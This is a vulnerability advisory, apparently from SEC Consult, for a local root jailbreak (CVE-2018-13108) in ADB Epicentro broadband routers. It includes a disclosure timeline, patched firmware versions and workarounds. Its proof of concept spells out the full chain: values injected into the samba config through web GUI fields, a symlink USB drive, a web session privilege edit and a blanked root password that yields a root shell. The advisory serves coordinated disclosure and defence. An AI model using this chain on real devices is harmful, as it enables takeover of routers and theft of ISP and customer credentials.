Project Description

All ADB broadband gateways / routers based on the Epicentro platform used by many telecommunication providers (ISPs) world-wide are affected by a local root jailbreak vulnerability where attackers are able to gain root access on the device and extract further information such as sensitive configuration data of the ISP (e.g. VoIP credentials) or attack the internal network of the ISP.

Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability:

Authorization Bypass in all ADB Broadband Gateways / Routers

Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers

Vendor description

“ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies.”

Source: https://www.adbglobal.com/about-adb/

“Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions.”

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation

By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges. Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys. Furthermore, attacks on the internal network side of the ISP are possible by using the device as a jump host, depending on the internal network security measures.

Network security should not depend on the security of independent devices, such as modems. An attacker with root access to such a device can enable attacks on connected networks, such as administrative networks managed by the ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description

1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)

Most ADB devices offer USB ports in order for customers to use them for printer or file sharing. In the past, ADB devices have suffered from symlink attacks e.g. via FTP server functionality which has been fixed in more recent firmware versions.

The “Network File Sharing” feature of current ADB devices via USB uses a samba daemon which accesses the USB drive with highest access rights and exports the network shares with root user permissions. The default and hardcoded setting for the samba daemon within the smb.conf on the device has set “wide links = no” which normally disallows gaining access to the root file system of the device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation and samba configuration file parsing problem which makes it possible to access the root file system of the device with root access rights via a manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session information of the web server in order to escalate web GUI privileges and start a telnet server and gain full system level shell access as root.

This is a local attack and not possible via remote access vectors as an attacker needs to insert a specially crafted USB drive into the device! Usually not even the ISPs themselves have direct root access on ADB devices hence this attack is quite problematic for further internal attacks. It is possible to change network routes and attack networks and systems within the internal network of the ISP or add backdoors or sniffers to the device. Furthermore, attackers are able to gain access to all stored credentials, such as PPP, wireless, CPE management or VoIP passwords.

Proof of concept

1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)

The samba configuration file (smb.conf) of the ADB devices has set the following default settings. All file system operations will be performed by the root user as set in the “force user” / “force group” setting of the exported share:

[global] netbios name = HOSTNAME workgroup = WORKGROUP wide links = no smb ports = 445 139 security = share guest account = root announce version = 5.0 socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536 null passwords = yes name resolve order = hosts wins bcast wins support = yes syslog only = yes read only = no hosts allow = 192.168.1.1/255.255.255.0 [share] path = /mnt/sdb1/. read only = false force user = root force group = root guest ok = yes

An attacker can edit various values such as “netbios name” and “workgroup” via the web GUI. The web GUI does some basic filtering and newlines are unfortunately not allowed (the samba config file is line-based) hence a special bypass has been crafted in order to change the default setting “wide links = no” to “wide links = yes”. This enables symlinks to the root file system.

By using the following netbios name and workgroup, samba can be tricked into allowing symlinks to the root file system of the device:

netbios domain / workgroup = =wide links = yes \ \ netbios name = wide links = yes \

Relevant HTTP POST parameters:

&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C

According to the manpage of smb.conf, any line ending in a \ is continued by the samba parser on the next line. Furthermore, it states that “Only the first equals sign in a parameter is significant.” – which it seems can be bypassed by adding a backslash \. The parser now thinks that the “wide links = yes” has been set and omits the hardcoded “wide links = no” which comes further down below in the smb.conf file.

In order to add those special values within the web GUI a proxy server such as burp proxy is needed because of basic input validation on the client side (not server side).

The USB drive needs to be formatted to ext2 or ext3 which is supported by the ADB device. Then create a symlink to the root file system via the following command on the attacker’s computer:

ln -s / /path/to/usbdevice/rootfs

After those settings have been changed and the USB drive has been set up, the USB drive can be inserted into the ADB device. The USB volume needs to be exported (with read/write permissions) as a share via the web GUI. Afterwards it can be accessed over the network and the “rootfs” folder example from above will give an attacker access to the ADB root file system with “read & write” access permissions as root.

Most file systems / partitions on the device are mounted read-only per default, but the most important one “/tmp” contains all settings and is mounted writable for operations.

The defaut user “admin” usually has little access rights during normal operations which can be changed by manipulating the session file of the web server within /tmp/ui_session_XXX where XXX is the session id of the currently logged on user, e.g. change:

from: access.dboard/settings/management/telnetserver =|> 2001 to: access.dboard/settings/management/telnetserver =|> 2220 etc. (or change all entries for maximum access level)

This way, an attacker can give himself all/highest access permissions within the GUI and change all the settings of the device! Hence the telnet or SSH server can be started even though they might have been disabled by the ISP. Furthermore, the /tmp/passwd file has to be changed in order to allow root access via shell/telnet:

change: root:*:0:0:root:/root:/bin/ash to: root::0:0:root:/root:/bin/ash

Now telnet into the device with root and no password. Example of an ADB DV2210 device:

Trying $IP... Connected to $IP. Escape character is '^]'. Login root: BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash) Enter 'help' for a list of built-in commands. ___ ___ ___ ___ |\__\ /\ \ /\ \ /\ \ |:| | /::\ \ /::\ \ /::\ \ |:| | /:/\:\ \ /:/\:\ \ /:/\:\ \ |:|__|__ /::\~\:\ \ /::\~\:\ \ _\:\~\:\ \ /::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \:\__\ /:/~~/~ \/__\:\/:/ / \/__\:\/:/ / \:\ \:\ \/__/ /:/ / \::/ / \::/ / \:\ \:\__\ \/__/ /:/ / \/__/ \:\/:/ / /:/ / \::/ / \/__/ \/__/ .................................................................. yet another purposeful solution by A D B Broadband .................................................................. root@$hostname:~# id uid=0(root) gid=0(root) groups=0(root) root@$hostname:~#

Vulnerable / tested versions

The following devices & firmware have been tested which were the most recent versions at the time of discovery.

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV4202N – E_3.3.0, latest firmware version, depending on ISP

ADB DV 2210 – E_5.3.0, latest firmware version, depending on ISP

ADB VV 5522 – E_8.3.0, latest firmware version, depending on ISP

ADB VV 2220 – E_9.0.6, latest firmware version, depending on ISP

etc.

It has been confirmed by ADB that all their ADB modems / gateways / routers based on the Epicentro platform with USB ports and network file sharing features are affected by this vulnerability in all firmware versions for all their customers (ISPs) at the time of identification of the vulnerability.

Vendor contact timeline

2016-06-15: Contacting vendor ADB, exchanging encryption keys & advisory. Asking about affected devices / firmware, timeline for hotfix. Fast initial response from ADB providing requested information 2016-06-16: Asking about other affected devices 2016-06-17: Resending previous question due to encryption problems 2016-07-04: Conference call 2016-07 – 2017-04: Further coordination, waiting for firmware release, implementation & rollout phases for their customers 2018-07-04: Embargo lifted, public release of security advisory

Solution

The firmware versions depend on the ISP / customer of ADB and may vary!

Patch version:

ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP

ADB DV2210 >= E_5.3.2, firmware version depending on ISP

ADB VV5522 >= E_8.3.2, firmware version depending on ISP

ADB VV2220 >= E_9.3.2, firmware version depending on ISP

Centro Business 1 >= 7.12.10

Centro Business 2 >= 8.06.08

etc.

Workaround

Restrict access to the web interface and only allow trusted users.

Change any default/weak passwords to strong credentials.

Don’t allow remote access to the web GUI via Internet.

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

EOF J. Greil / @2018